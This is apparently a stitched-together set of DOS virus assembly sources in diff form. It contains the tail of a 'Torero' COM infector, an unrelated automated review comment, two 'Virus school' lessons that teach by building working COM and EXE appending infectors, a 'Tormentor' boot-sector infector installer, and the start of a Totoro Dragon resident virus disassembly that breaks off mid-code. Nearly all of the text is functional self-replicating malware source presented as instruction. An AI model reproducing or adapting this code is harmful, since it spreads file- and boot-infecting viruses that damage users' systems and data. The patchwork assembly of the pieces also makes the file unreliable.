call lseek_end ; the file
mov ah,40h ; Append our k-r4d
mov cx,torero_size ; code :)
lea dx,torero_start
call int_21h
pop ax ; Make the jmp to
sub ax,3 ; our virus body
mov word ptr cs:[com_header+1],ax ; for the new file
call set_marker
call lseek_start ; Lseek to the start
mov ah,40h ; Write the new header
mov cx,3 ; in so we'll be always
lea dx,com_header ; executed first ;P
call int_21h
mov ax,word ptr es:[di+11h] ; Actual size in AX
sub ax,3 ; Lseek to the position
call lseek_end ; of the original header
mov ah,40h ; Destroy all the info,
mov cx,3 ; already stored in the
lea dx,garbage ; directory entry };)
call int_21h
close_and_pop: mov ah,3eh ; Close the file
call int_21h
call reset_int_24h ; Reset int 24h
pop es ds di si ; And pop out all the
pop dx cx bx ax ; shit we pushed b4
popf
ret
; ÄÄ´ Call to the original int 13h ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
int_13h: pushf
call dword ptr cs:[old_int_13h] ; Call the original
ret ; int 13h
; ÄÄ´ Call to the original int 21h ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
int_21h: pushf
call dword ptr cs:[old_int_21h] ; Call the original
ret ; int 21h
; ÄÄ´ Get SFT in ES:DI ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
get_sft: push ax bx
mov ax,1220h ; Get job file table
int 2fh ; in ES:DI (DOS 3+)
jc bad_sft
xor bx,bx ; Get the address of
mov ax,1216h ; the specific SFT for
mov bl,byte ptr es:[di] ; our handle
int 2fh
bad_sft: pop bx ax ; Pop registers and
ret ; return to the code
; ÄÄ´ Check our infection mark ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
check_mark: cmp byte ptr es:[di+4],80h ; Compare with the min.
ret ; value of our mark
; ÄÄ´ Read the directory entry ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
read_entry: push ax bx cx
call parameters ; Load the sector
int 25h
pop cx cx bx ax
ret
; ÄÄ´ Sector loading ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
parameters: mov ax,word ptr es:[di+1bh] ; Load the sector
mov word ptr cs:[control_block],ax ; number in our
mov ax,word ptr es:[di+1dh] ; control block
mov word ptr cs:[control_block+2],ax ; Read a long
mov cx,0ffffh ; sector, 4 bytes
push cs ; CS=DS
pop ds
mov word ptr cs:[control_block+4],1 ; One sector
mov word ptr cs:[control_block+6],offset sector
mov word ptr cs:[control_block+8],cs
lea bx,control_block ; Control block
push ds si
lds si,dword ptr es:[di+7] ; Point to the
lodsb ; DPB
pop si ds
ret
; ÄÄ´ Point to the original header ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
point_entry: mov al,byte ptr es:[di+1fh] ; Guess the entry
xor ah,ah
push cx
mov cl,5 ; Multiply it*20h
shl ax,cl
pop cx
lea si,sector ; Calculate its offset
add si,ax ; into the sector and
add si,0ch ; move to si+0ch (header)
ret
; ÄÄ´ Set int 24h ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
set_int_24h: push ax si di
push ds es
xor ax,ax ; Point to the IVT
mov ds,ax
push cs ; CS=ES
pop es
mov si,24h*4 ; Save the original int
mov di,offset old_int_24h ; 24h address and set
cld ; ours l8r
movsw
movsw
mov word ptr [si-4],offset new_int_24h
mov word ptr [si-2],cs
pop es ds
pop di si ax
ret
; ÄÄ´ Restore int 24h ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
reset_int_24h: push ax si di
push ds es
xor ax,ax ; Point to the IVT
mov es,ax
push cs ; CS=DS
pop ds
mov si,offset old_int_24h ; Restore the original
mov di,24h*4 ; int 24h address
cld
movsw
movsw
pop es ds
pop di si ax
ret
; ÄÄ´ Torero's int 24h handler ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
new_int_24h: mov al,3 ; Pass the error code
iret
old_int_24h: dw ?,? ; Original int 24h
; ÄÄ´ Set our infection mark ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
set_marker: mov byte ptr es:[di+4],80h ; Attribute bit 8
ret
; ÄÄ´ Lseek to the start of the file ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
lseek_start: mov word ptr es:[di+15h],0 ; Read pointer=0
ret
; ÄÄ´ Lseek to the end of the file ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
lseek_end: mov word ptr es:[di+15h],ax ; Read pointer=file
ret ; length (EOF)
; ÄÄ´ Open the host we're being executed from ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
open_host: mov ah,62h ; Get PSP address
int 21h
push es
mov ds,bx
mov bx,word ptr ds:[2ch] ; DS:2ch=PSP segment
mov es,bx
xor di,di
mov al,1 ; Look for 01h (the
mov cx,0ffffh ; mark which sepparates
repnz scasb ; the path from the
jnz emergency ; name of the file that
; is being executed)
xor al,al
scasb
push es
pop ds es
mov ah,3dh ; Open the host
mov dx,di
call int_21h
xchg bx,ax ; Pass handle to BX
ret ; and return
; ÄÄ´ Emergency routine... data lost! ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
emergency: push cs ; CS=DS
pop ds
mov ah,9 ; Show the message...
lea dx,windows ; This programs requires
int 21h ; Microsoft Windows
mov ax,4c01h ; Errorlevel=01 :)
int 21h
; ÄÄ´ Data area ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
sector db 200h dup (?) ; The long sector
control_block dd ? ; Control block
dw ?
garbage dd ?
db ';)'
windows db 'This program requires Microsoft Windows.'
db 0dh,0ah,'$'
action db ? ; Reading or writing?
infecting db ?
com_header db 0e9h,?,? ; The COM header
header_store db 3 dup (?) ; Temporal header store
torero_end label byte
torero ends
end torero_start
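Review bot: The comment on `set_marker` (`; Attribute bit 8`) and the header's "eigth attribute bit" use one-based bit numbering, while the value written and compared is 80h, which is bit 7 in the zero-based numbering every FAT attribute-byte reference uses; a reader cross-checking the mark against a directory-entry layout will count from zero and look at the wrong bit. Suggest `; Attribute bit 7 (80h), the reserved high bit` on `set_marker`, and the same wording on `check_mark`, which tests the identical value. The header paragraph would also benefit from stating the value 80h explicitly rather than only the ordinal.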

@ -0,0 +1,158 @@
;
; Virus school, lession 1 (c) 1992 Tormentor [Demoralized Youth]
;
; This is the first lession on how to make an own virus.
; Hope you'll learn something of it...
; To be compiled with TASM 3.0 or higher.
;
; This virus is quite dumb and 'noisy'
; It updates the filedate and time, changes DTA before execution causing
; some progs to belive they are executed with parameters...
; But this should only be a 'raw' virus that you can develop.
; Certain program may hang, so i recommend you not to spread to geeks
; since there is MANY better viruses to use for such nice purpose.
;
; If you want to conntact me or other virus-writers call me on my board:
; Swedish Virus Laboratory +46-3191-9393
;
; Greetings to All virus-writers!
;
.model tiny
.radix 16
.code
Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
org 100
dummy_code: db 'M' ; Mark file as infected.
db 3 DUP(90) ; This is to simulate a infected prog.
; Not included in virus-code.
Virus_Start: call where_we_are ; Now we call the next bytes, just to
; know what address virus lies on.
where_we_are: pop si ; Since the virus-code's address will
; differ from victim to victim.
; a POP SI after a call will give us the
; address which equals to 'where_we_are'
; Very important.
;-----------------------------------------------------------------------
; Now we have to put back the original 4 bytes in the host program, so
; we can return control to it later:
add si,_4first_bytes-where_we_are
mov di,100
cld
movsw
movsw
;------------------------------------------------------------------------
; We have to use SI as a reference since files differ in size thus making
; virus to be located at different addresses.
sub si,_4first_bytes-Virus_Start+4
;------------------------------------------------------------------------
; Now we just have to find victims, we will look for ALL .COM files in
; the current directory.
mov ah,4e ; We start to look for a *.COM file
look4victim: mov dx,offset file_match-Virus_Start
add dx,si
int 21
jc no_victim_found ; If no *.COM files was found.
mov ax,3d02 ; Now we open the file.
mov dx,9e ; The found victims name is at ds:009e
int 21 ; in DTA.
jc cant_open_file ; If file couldn't be open.
xchg ax,bx ; Save filehandle in bx
; (we could use MOV BX,AX but we saves one byte by using xchg )
mov ah,3f ; Now we read the first 4 bytes
mov cx,4 ; from the victim -> buffer
mov dx,offset _4first_bytes-Virus_Start
add dx,si
; We will then overwrite them with
int 21 ; a JMP XXXX to virus-code at end.
jc read_error
cmp byte ptr ds:[si+_4first_bytes-Virus_Start],'M'
jz sick_or_EXE ; Check if infected OR *.EXE
; Almost all EXE files starts with 'M' and we mark the infected files by
; starting with 'M' which equals to DEC BP
; Now we just have to have one check instead of 2 (infected and *.EXE)
mov ax,4202 ; Position file-pointer to point at
xor cx,cx ; End-of-File.
xor dx,dx ; Any writing to file will now APPEND it
int 21 ; Returns AX -> at end.
sub ax,4 ; Just for the JMP structure.
mov word ptr ds:[_4new_bytes+2],ax
; Build new JMP XXXX to virus.
; ( logic: JMP AX )
mov ah,40 ; Append file with virus code.
mov cx,offset Virus_Lenght
; File-size will increase with
mov dx,si ; Virus_Lenght.
int 21
jc write_error
mov ax,4200 ; Position file-pointer to begin of file
xor cx,cx ; So we can change the first 3 bytes
xor dx,dx ; to JMP to virus.
int 21
mov ah,40 ; Write new 3 bytes.
mov cx,4 ; After this, executing the file will
mov dx,offset _4new_bytes-Virus_Start
add dx,si
; result in virus-code executing before
int 21 ; original code.
; (And more files will be infected)
jc write_error
mov ah,3e ; Close file, now file is infected.
int 21 ; Dos function 3E (close handle)
Sick_or_EXE: mov ah,4f ; Well, file is infected. Now let's
jmp look4victim ; find another victim...
write_error: ; Here you can test whats went wrong.
read_error: ; This is just for debugging purpose.
cant_open_file: ; These entries are equal to eachother
no_victim_found: ; but could be changed if you need to test something.
mov ax,100 ; Every thing is put back in memory,
push ax ; lets us RET back to start of program
ret ; and execute the original program.
notes db ' (c) 1992 Tormentor ,Swedish Virus Laboratory'
db ' / Demoralized Youth / '
file_match db '*.COM',0 ; Pattern to search for.
; Don't forget to end with 0 !
_4first_bytes: ret ; Here we save the 4 first org. bytes
db 3 DUP(0)
; We have a ret here since this file isn't a REAL infection.
_4new_bytes db 'M',0E9, 00, 00 ; Here we build the 4 new org. bytes
; so our virus-code will be run first.
Virus_End EQU $
end dummy_code

@ -0,0 +1,160 @@
;
; Virus Lession #2 'How to make a non-resident EXE infector'
;
; (c) 1992 Tormentor // Demoralized Youth
;
; Well, I had not time to comment this code as much as I wanted to,
; but here you are.
; What can be hard to understand is the .EXE header changes, but if
; you look at the description on the header (ex: Norton guide Tech. Ref)
; you'll understand...
; Anyway, feel free to use this example and if you have any questions
; or anything call my board: Swedish Virus Labratory +46-3191-9393
;
; Greetings to all virus-writers!
;
; /Tormentor
;
.model tiny
.radix 16
.code
Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
org 100
Virus_Start: call where_we_are
where_we_are: pop si
sub si,where_we_are-Virus_Start
mov ax,es
add ax,10
add ax,cs:[si+Exe_header-Virus_Start+16]
push ax
push cs:[si+Exe_header-Virus_Start+14]
push ds
push cs
pop ds
mov ah,1a
mov dx,offset Own_dta-Virus_Start
add dx,si
int 21
mov ah,4e ; We start to look for a *.EXE file
look4victim: mov dx,offset file_match-Virus_Start
add dx,si
int 21
jnc cont2
jmp no_victim_found ; If no *.EXE files was found.
cont2: mov ax,3d02
mov dx,Own_dta-Virus_Start+1e
add dx,si
int 21
jnc cont1
jmp cant_open_file
cont1: xchg ax,bx
mov ah,3f
mov cx,1c
mov dx,offset Exe_header-Virus_Start
add dx,si
int 21
jc read_error
cmp byte ptr ds:[si+Exe_header-Virus_Start],'M'
jnz no_exe ; !!! Some EXEs starts with ZM !!!
cmp word ptr ds:[si+Exe_header-Virus_Start+12],'DY'
jz infected
mov ax,4202 ; Go EOF
xor cx,cx
xor dx,dx
int 21
push dx
push ax
mov ah,40 ; Write virus to EOF.
mov cx,Virus_Lenght
mov dx,si
int 21
mov ax,4202 ; Get NEW filelenght.
xor cx,cx
xor dx,dx
int 21
mov cx,200
div cx
inc ax
mov word ptr ds:[Exe_header-Virus_Start+2+si],dx
mov word ptr ds:[Exe_header-Virus_Start+4+si],ax
pop ax
pop dx
mov cx,10
div cx
sub ax,word ptr ds:[Exe_header-Virus_Start+8+si]
mov word ptr ds:[Exe_header-Virus_Start+16+si],ax
mov word ptr ds:[Exe_header-Virus_Start+14+si],dx
mov word ptr ds:[Exe_header-Virus_Start+12+si],'DY'
mov ax,4200 ; Position file-pointer to begin of file
xor cx,cx
xor dx,dx
int 21
mov ah,40 ; Write header
mov cx,1c
mov dx,offset Exe_header-Virus_Start
add dx,si
int 21
jc write_error
no_exe:
infected:
mov ah,3e
int 21
Sick_or_EXE: mov ah,4f
jmp look4victim
write_error: ; Here you can test whats went wrong.
read_error: ; This is just for debugging purpose.
cant_open_file: ; These entries are equal to eachother
no_victim_found: ; but could be changed if you need to test something.
pop ds
retf
file_match db '*.EXE',0 ; Pattern to search for.
; Don't forget to end with 0 !
Exe_header db 16 DUP(0)
dw 0fff0 ; Adjustment just for this COM-file.
db 4 DUP(0)
notes db '(c) 1992 Tormentor / Demoralized Youth ',0a,0d
db 'Rather first in hell, than second in heaven.'
Own_Dta db 02bh DUP(0)
Virus_End EQU $
end Virus_Start


@ -0,0 +1,543 @@
code_seg segment
assume cs:code_seg,ds:code_seg
org 100h
tormentor proc far
@disp macro string
mov dx,offset string
mov ah,09h
int 21h
endm
@exit macro
mov ax,4c00h
int 21h
endm
@cls macro mode
mov ah,00h
mov al,mode
int 10h
endm
start: jmp main
boot_area dw 256 dup (0)
boot_sec dw 512 dup (0)
message db "Tormentor Strain A",13,10
db "Written by The High Evolutionary",13,10
db "Copyright (C) 1991 by The RABID Nat'nl Development Corp."
db 13,10,13,10
db "Press any key to install onto media in drive A:",13,10
db "(Or press CTRL-C to abort)$",13,10
paused db 13,10,13,10
db "[Paused] Insert destination disk if desired and press",13,10
db "any key, otherwise, press any key$",13,10
done db "Done!$",13,10
r_fail db 13,10,13,10
db "Failed to READ in boot sector$",13,10
w_fail db 13,10,13,10
db "Failed to WRITE boot sector$",13,10
f_infec db 13,10,13,10
db "SHIT! We failed to write the virus code to the disk!!!$",13,10
r_boot db 13,10,13,10
db "Now READING in the boot sector$",13,10
w_boot db 13,10,13,10
db "Now WRITING the boot sector to track 719$",13,10
w_vir db 13,10,13,10
db "Now WRITING the VIRUS to the boot sector$",13,10
succ db 13,10,13,10
db "Success! We installed Tormentor onto the drive$",13,10
memerr db 13,10,13,10
db "BOMB! We had a memory allocation error. Bailing out...$",13,10
db 13,10
read_shit db 13,10,13,10
db "Reading in shit via INT 25...$",13,10
db 13,10
intro db "You are in Torment$",13,10
bootseg dw ? ; Storage segment address or mem. block
; containing copy of boot record
dssave dw ? ; Storage for DS register
;dssave dw seg group ; Storage for DS register
pspseg dw ? ; PSP segment storage
;stack segment para stack 'STACK' ; Code Segment
;stack ends
;_data segment word public 'DATA' ; Data Segment
;_data ends
;dgroup group data,stack ; Define segment group
;*****************************************************************************
; Boot record information to infect both floppies and hard-drives
;*****************************************************************************
bootrecord struc
bootjump db 3 dup (?) ; Initial 3 byte jmp instruction
oemstring db 8 dup (?) ; OEM version and DOS
sectorbytes dw ? ; Bytes per sector
clustersec db ? ; Sectors per cluster
reservedrec dw ? ; Reserved sectors
fatcopies db ? ; number of FAT copies
direntries dw ? ; number of root dir entries
totalsectors dw ? ; Total disk sectors
mediadescrip db ? ; Media Descriptor
fatsectors dw ? ; number of sectors occupied by 1 FAT
tracksectors dw ? ; number of sectors per track
heads dw ? ; number of heads
hiddensectors dw ? ; number of hidden sectors
bootrecord ends
drive db ? ; Current drive pointer
memalloc proc near
push bp ; Save base pointer
push bx ; Save BX
mov bp,sp ; init base pointer
xor al,al ; Zero out AL
mov ah,48h ; Allocate mem. function
int 21h
jnc end_memalloc ; exit if no error
mov word ptr [bp],bx
end_memalloc:
pop bx ; Restore BX
pop bp ; Restore Base Pointer
ret
memalloc endp
main:
get_default_drive:
mov ah,19h
int 21h
mov byte ptr drive,al ; Move current drive into drive
; mov ds,dssave ; Initialise DS
; mov ax,es ; get PSP address
; mov word ptr pspseg,ax ; and save it...
jmp read_boot
; mov bx,40h ; Allocate 1024 bytes
; call memalloc ; Allocate BX block of memory
; jnc read_boot
; @disp memerr
; jmp quit
read_boot:
@disp read_shit
mov ah,08h
int 21h
mov word ptr bootseg,ax
push ax ; Save AX onto the stack
mov al,0
; mov al,byte ptr drive ; Move current drive into AL
xor ah,ah ; Zero out AH
; pop ds ; Restore Data_seg
pushf ; Save flags
mov dx,0 ; Read in sector 0
mov cx,1 ; Read in 1 sector
mov bx,offset boot_sec ; Store data at DS:boot_sec
int 25h ; Read in the disk
popf ; clear flags used by flags
@disp done
mov ah,08h
int 21h
; assume ds:code_seg ; Restore DS
begin: @cls 03
; mov ah,00 ; Set screen
; mov al,03 ; Set screen for 80x25 color
; int 10h ; Call BIOS
@disp message
mov ah,08h ; Wait for a keypress
int 21h
mov cx,3
read_sector:
@disp r_boot ; Display that we are reading the
; sector from the disk
push cx ; Counter is pushed onto the stack
mov ax,201h ; Read in 1 sector
mov bx,offset boot_area ; Store it in boot_area
mov cx,1 ; Set counter to 1
mov dx,0 ; Set for drive 0, head 0
int 13h ; Call BIOS
pop cx ; Restore counter
jnc good_read ; If there were no errors, then
; jump to good_read
loop read_sector ; Jump back and try reading the sector
; again while CX>0
@disp r_fail
mov ax,4c00h ; Exit
int 21h ; Call DOS
good_read:
mov cx,3 ; Set counter to 3
@disp paused ; Display message for pause
mov ah,08h ; Wait for a key
int 21h ; Call DOS
;*****************************************************************************
; Write good sector to track 719 (Head 1, track 27, sector 9)
;*****************************************************************************
write_sector:
@disp w_boot ; Display that we are writing the
; sector to disk
mov ax,301h ; Set for writing the boot sector
mov bx,offset boot_area ; Set buffer to what we read in
; mov bx,offset infected_data
mov cx,2709h ; Set counter to 2709h
mov dx,100h ; Head 1, drive 0
int 13h ; Call BIOS
pop cx ; Restore the counter
jnc good_write ; If we wrote the sectors allright,
; then jump to good_write
loop write_sector
@disp w_fail
mov ax,4c00h ; Exit
int 21h ; Call DOS
good_write:
mov cx,3 ; Copy 3 into CX
@disp w_vir
infect_floppy:
push cx ; Push it onto the stack
mov ax,301h ; Write 1 sector
mov bx,offset infected_data ; Write corrupt boot sector to the
; drive
mov cx,1 ; Set counter to 1
mov dx,0 ; Set for drive A:
int 13h ; Call BIOS
jnc good_infection ; If there are no problems, then
; continue
loop infect_floppy ; Otherwise, try again until CX=0
@disp f_infec ; If CX=0, then display the message
; and then exit
mov ax,4c00h ; Exit
int 21h ; Call DOS
good_infection:
@disp succ
mov ax,4c00h
int 21h
;*****************************************************************************
; The following is a copy of the infected boot sector to copy to sector 0
;*****************************************************************************
infected_data db 0EBh, 34h
nop
dec cx
inc dx
dec bp
and [bx+si],ah
xor bp,word ptr ds:[33h]
add al,[bp+si]
add [bx+si],ax
add dh,[bx+si+0]
rol byte ptr [bp+si],1 ; Rotate
std ; Set direction flag
add al,[bx+si]
or [bx+si],ax
add al,[bx+si]
db 19 dup (0)
; db 'Tormentor Strain A - RABID Nat''nl Development Corp.'
adc al,[bx+si]
add [bx+si],al
add [bx+di],al
add dl,bh
xor ax,ax ; Zero register
mov ds,ax
mov ss,ax
mov bx,7C00h ; Pointer to boot segment
mov sp,bx
push ds
data_14 db 53h
dec word ptr ds:[413h]
int 12h ; Put (memory size)/1K in ax
mov cl,6
shl ax,cl ; Shift w/zeros fill
mov es,ax
xchg ax,word ptr ds:[4Eh]
mov word ptr ds:[7DABh],ax
mov ax,128h
xchg ax,word ptr ds:[4Ch]
mov word ptr ds:[7DA9h],ax
mov ax,es
xchg ax,word ptr ds:[66h]
mov word ptr ds:[7DAFh],ax
mov ax,0BBh
xchg ax,word ptr ds:[64h]
mov word ptr ds:[7DADh],ax
xor di,di ; Zero register
mov si,bx
mov cx,100h
cld ; Clear direction
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
sti ; Enable interrupts
push es
mov ax,85h
push ax
retf
push bx
xor dl,dl ; Zero register
call sub_2 ; (00FB)
pop bx
push ds
pop es
mov ah,2
mov dh,1
call sub_6 ; (011F)
jc loc_2 ; Jump if carry Set
push cs
pop ds
mov si,offset ds:[0Bh]
mov di,offset ds:[7C0Bh]
mov cx,2Bh
cld ; Clear direction
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
jz loc_ret_3 ; Jump if zero
loc_2:
pop bx
pop ax
push cs
mov ax,0AFh
push ax
loc_ret_3:
retf ; Return far
read_error:
push cs
pop ds
mov si,1DBh
call sub_1 ; (00DA)
xor ah,ah ; Zero register
int 16h ; Keyboard i/o ah=function 00h
; get keybd char in al, ah=scan
xor ax,ax ; Zero register
int 13h ; Disk dl=drive a ah=func 00h
; reset disk, al=return status
push cs
pop es
mov bx,offset ds:[200h]
mov cx,6
xor dx,dx ; Zero register
mov ax,201h
int 13h ; Disk dl=drive a ah=func 02h
; read sectors to memory es:bx
jc read_error ; Jump if carry Set
mov cx,0FF0h
mov ds,cx
jmp dword ptr cs:data_16
;
; Insert Tormentor endp here...
;
;tormentor endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_1 proc near
loc_5:
mov bx,7
cld ; Clear direction
lodsb ; String [si] to al
or al,al ; Zero ?
jz loc_ret_9 ; Jump if zero
jns loc_6 ; Jump if not sign
xor al,0D7h
or bl,88h
loc_6:
cmp al,20h
jbe loc_7 ; Jump if below or =
mov cx,1
mov ah,9 ;
int 10h ; Video display ah=functn 09h
; set char al & attrib bl @curs
loc_7:
mov ah,0Eh
int 10h ; Video display ah=functn 0Eh
; write char al, teletype mode
jmp short loc_5 ; (00DA)
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_2:
mov bx,200h
mov cx,2
mov ah,cl
call sub_5 ; (011D)
mov cx,2709h
xor byte ptr es:[bx],0FDh
jz loc_8 ; Jump if zero
mov cx,4F0Fh
loc_8:
jmp short loc_ret_9 ; (0127)
nop
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_3:
mov ah,2
mov bx,200h
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_4:
mov cx,1
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_5:
mov dh,0
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_6:
mov al,1
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_7:
pushf ; Push flags
call dword ptr cs:data_15
loc_ret_9:
retn
sub_1 endp
push ax
push bx
push cx
push dx
push es
push ds
push si
push di
pushf ; Push flags
push cs
pop ds
cmp dl,1
ja loc_11 ; Jump if above
and ax,0FE00h
jz loc_11 ; Jump if zero
xchg al,ch
shl al,1 ; Shift w/zeros fill
add al,dh
mov ah,9
mul ah ; ax = reg * al
add ax,cx
sub al,6
cmp ax,6
ja loc_11 ; Jump if above
push cs
pop es
call sub_3 ; (0115)
jc loc_10 ; Jump if carry Set
mov di,offset data_14
mov si,offset ds:[243h]
mov cx,0Eh
std ; Set direction flag
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to
; es:[di]
jz loc_11 ; Jump if zero
sub si,cx
sub di,cx
mov cl,33h ; '3'
rep movsb ; Rep when cx >0 Mov [si] to
; es:[di]
call sub_2 ; (00FB)
push cx
push bx
call sub_3 ; (0115)
mov ah,3
xor bx,bx ; Zero register
call sub_4 ; (011A)
pop bx
pop cx
jc loc_10 ; Jump if carry Set
mov dh,1
mov ah,3
call sub_6 ; (011F)
loc_10:
xor ax,ax ; Zero register
call sub_7 ; (0121)
loc_11:
mov ah,4
int 1Ah ; Real time clock ah=func 04h
; read date cx=year, dx=mon/day
cmp dh,9
jne not_month ; Jump if not equal
mov si,1B1h
call sub_1 ; (00DA)
not_month:
popf ; Pop flags
pop di
pop si
pop ds
pop es
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:data_15
data_15 dd 0C602EC59h
data_16 dd 0F000E6F2h
esc 2,ch ; coprocessor escape
and [bp+di-4141h],al
movsb ; Mov [si] to es:[di]
idiv word ptr [bp-85Ch] ; ax,dxrem=dx:ax/data
xchg ax,si
mov si,offset ds:[0B4A5h]
mov ax,0DAA7h
esc 5,[bx+si] ; coprocessor escape
db 'IO SYSMSDOS SYS', 0Dh, 0Ah
db 'Non-system disk or disk error', 0Dh
db 0Ah
add [bx+si],al
push bp
; jmp cont
; db 'Tormentor Strain A - RABID Nat''nl Development Corp.'
stosb
;cont: stosb ; Store al to es:[di]
tormentor endp
quit: mov ax,4c00h
int 21h
code_seg ends
end start


@ -0,0 +1,713 @@
;TOTORO DRAGON disassembly. Included, for your pleasure, in Crypt
;Newsletter 14. Profuse thanks to Stormbringer, wherever he is.
;***************************************************************************
;* The Totoro Dragon Virus from Taiwan *
;***************************************************************************
;* This virus is a fairly simple resident .EXE/.COM infector. It goes *
;*resident by re-executing the infected file and using Int 21, function 31.*
;*When it infects a .COM, it puts itself at the beginning of the file and *
;*starts the host at an offset of 600h (700h in memory), giving the virus *
;*an effective length of 1536 bytes, plus an extra 4 bytes for its marker *
;*at the end ("YTIT"). It infects .EXE files using the "standard" method. *
;*While it does save file attributes, the time and date change when a file *
;*is infected. The virus activates on Saturdays. When active, it installs*
;*an Int 08 (Timer click) handler that counts to 0CCCh, then shoves the *
;*text off the screen and prints the following in the upper left-hand *
;*corner: *
;* *
;* ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ· *
;* º Totoro Dragon º *
;* ºHello! I am TOTORO CATº *
;* º Written by Y.T.J.C.T º *
;* º in Ping Tung. TAIWAN º *
;* º Don't Worry,be Happy º *
;* ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ *
;* *
;*It then restarts the counter and does it again. Other that this effect, *
;*the virus seems relatively harmless. *
;* *
;* *
;* Disassembly by Stormbringer *
;***************************************************************************
.model tiny
.radix 16
.code
org 100h
start:
jmp short COM_Entry_Point
nop
;***************************************************************************
;* Data Tables *
;***************************************************************************
File_Size_Off dw 5
File_Size_Seg dw 0
TSR_DAT dw 4262h
DS_Save dw 0F21h
ES_Save dw 0F21h
File_Attribs dw 20h
IP_Save dw 0
CS_Save dw 0F99
SP_Save dw 0
SS_Save dw 0
File_Type db 'C'
Wasted_Space db 0, 0, 0 ;?
;********************************************
; EXE_Header ;
;********************************************
EXE_Sig db 'MZ'
Last_Page_Len dw 14h
EXE_Size dw 5
Rel_Tbl_Items dw 0
Header_Size dw 20h
Minalloc dw 0
Maxalloc dw 0ffff
Init_SS dw 1
Init_SP dw 700h
Checksum dw 0
Init_IP dw 91h
Init_CS dw 1
First_Rel dw 001Eh
Overlay_Num dw 0
;********************************************
CS_Store dw 0
Command db 'COMMAND.COM', 0
db 00h, 80h, 00h
ES_Store_1 dw 0F21h
dw 5Ch
ES_Store_2 dw 0F21h
dw 6Ch
ES_Store_3 dw 0F21h
File_Handle dw 5
Buffer_For_Checks db 0
db 4Ch,0CDh, 21h
File_Name_Off dw 469h
File_Name_Seg dw 0DF5h
db 0
Mem_Seg dw 0F93h
IP_24 dw 156h
CS_24 dw 0DF5h
;************************************************************************
;* Virus Entry Point #1 (COM) *
;************************************************************************
COM_Entry_Point:
mov ax,0F1F1h ;Is the virus in memory?
int 21h
mov cs:CS_Store,0
